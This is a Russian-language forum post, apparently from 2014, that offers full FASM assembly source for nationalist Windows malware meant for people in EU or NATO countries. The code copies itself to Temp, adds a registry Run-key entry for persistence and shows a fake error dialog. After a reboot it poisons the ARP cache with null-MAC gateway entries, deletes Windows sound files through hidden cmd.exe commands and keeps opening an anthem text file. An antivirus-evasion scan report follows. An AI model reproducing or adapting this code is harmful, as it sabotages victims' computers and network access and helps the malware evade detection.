Националистический вредонос [FASM]

[IBM]

Хай всем, может кому надо, может у кого есть знакомые из стран ЕС или НАТО.

В свете недавних событий написал зверька с таким функционалом:

I при старте:
* Установка в папку Temp и ожидание перезагрузки
* После установки выводит сообщение об ошибке
II После перезагрузки:
* Херит ARP кэш, добавляя статичные записи для шлюза на мак адрес 00:00:00:00:00:00
* Удаляет звуковые файлы Windows
* Каждые 10 секунд выводит файл с текстом гимна Российской Федерации, на английском.

Особенности:

* Использование виртуальной памяти для массивов, поэтому весит всего лишь 3,5 КБ ( из-за текста гимна России внутри )

Как видите, основная фишка в :

Каждые 10 секунд выводит файл с текстом гимна Российской Федерации, на английском.

Можно сильно разозлить, или обидеть, западных соседей.

Код:

include 'win32ax.inc'

section '.data' data readable writeable
MasAddr dd 0
TempAddr dd 0
WinAddr dd 0
RussiaAddr dd 0
FileName db 'std.exe',0
AutoKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
ValueName db 'stdcall',0
ErrorMessage db 'An error occurred during initialization the program',0
ErrorTitle db 'Fatal Error',0
hkey dd ?
hFile dd 0
open    db 'open',0
cmd     db 'cmd.exe',0

proc    CommandExecution CommandAddr : DWORD
jmp @@100
@@100:
push    SW_HIDE
push    [WinAddr]
push    [CommandAddr]
push    cmd
push    open
push    0
call    [ShellExecute]
ret
endp

section '.code' code readable executable
start:

invoke  VirtualAlloc, 0, 1280, MEM_COMMIT, PAGE_READWRITE

mov     [MasAddr], eax
mov     [TempAddr], eax
add     [TempAddr], MAX_PATH
inc     [TempAddr]
push    MAX_PATH
push    [MasAddr]
push    0
call    [GetModuleFileName]


push    [TempAddr]
push    MAX_PATH
call    [GetTempPath]

push    FileName
push    [TempAddr]
call    [lstrcat]

push    [MasAddr]
push    [TempAddr]
call    [lstrcmpi]
test    eax, eax
je      @@10

push    0
push    [TempAddr]
push    [MasAddr]
call    [CopyFile]

invoke RegCreateKeyEx, HKEY_CURRENT_USER,AutoKey,NULL,NULL,NULL,KEY_ALL_ACCESS,NULL,hkey,NULL
invoke lstrlen, [TempAddr]
invoke RegSetValueEx,[hkey],ValueName,NULL,REG_SZ,[TempAddr],eax
invoke RegCloseKey,[hkey]

push    MB_ICONERROR
push    ErrorTitle
push    ErrorMessage
push    0
call    [MessageBox]

push    0
call    [ExitProcess]

@@10:
mov     eax, [MasAddr]
mov     ebx, 256
imul    ebx, 2
inc     ebx
add     eax, ebx
mov     [WinAddr], eax
push    MAX_PATH
push    [WinAddr]
call    [GetWindowsDirectory]
jmp     @@20
command_1 db '/c arp -d *',0
command_2 db '/c arp -s 192.168.1.1 00:00:00:00:00:00',0
command_3 db '/c arp -s 192.168.0.1 00:00:00:00:00:00',0
command_4 db '/c del %SystemDrive%\Windows\Media\*.wav /Q /S',0
file_1_:
file_1 file 'anthem.txt'
file_1_sz dd $ - file_1_
AnthemName db 'anthem.txt',0
@@20:
lea     eax, [command_1]
push    eax
call    CommandExecution

push    1000
call    [Sleep]

lea     eax, [command_2]
push    eax
call    CommandExecution

lea     eax, [command_3]
push    eax
call    CommandExecution

lea     eax, [command_4]
push    eax
call    CommandExecution

mov     eax, [WinAddr]
add     eax, 256
inc     eax
mov     [RussiaAddr], eax

push    [RussiaAddr]
push    MAX_PATH
call    [GetTempPath]
push    AnthemName
push    [RussiaAddr]
call    [lstrcat]

invoke  CreateFile, [RussiaAddr], GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov     [hFile], eax
invoke  WriteFile, [hFile], file_1, [file_1_sz], esp, 0
push    [hFile]
call    [CloseHandle]

xor     ebx, ebx
@@30:

push    SW_SHOW
push    ebx
push    ebx
push    [RussiaAddr]
push    open
push    ebx
call    [ShellExecute]

push    10000
call    [Sleep]
jmp @@30

.end start

Название файла: Cyb.exe
Размер файла: 3584 байт
Дата сканирования: Tue, 03 Jun 14 11:14:35 -0400
MD5-хэш файла: cb80a0e5201b2be5d70a29de5dd8154b

Результат: 6 из 38

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: TR/ATRAPS.Gen Trojan!
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
ClamAV (UNIX version): PUA.Win32.Packer.PrivateExeProte-15
Comodo: OK
Dr.Web: OK
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: Malware detected
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: HEUR:Trojan.Win32.Generic
McAfee Total Protection 2013: OK
Microsoft Security Essentials: OK
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Panda Antivirus: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: Suspicious:Worm.Palevo.jub.zxfk.mg
VBA: BScope.Dropper.Gen.16
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru


P.S. Кто не из России - ничего личного =))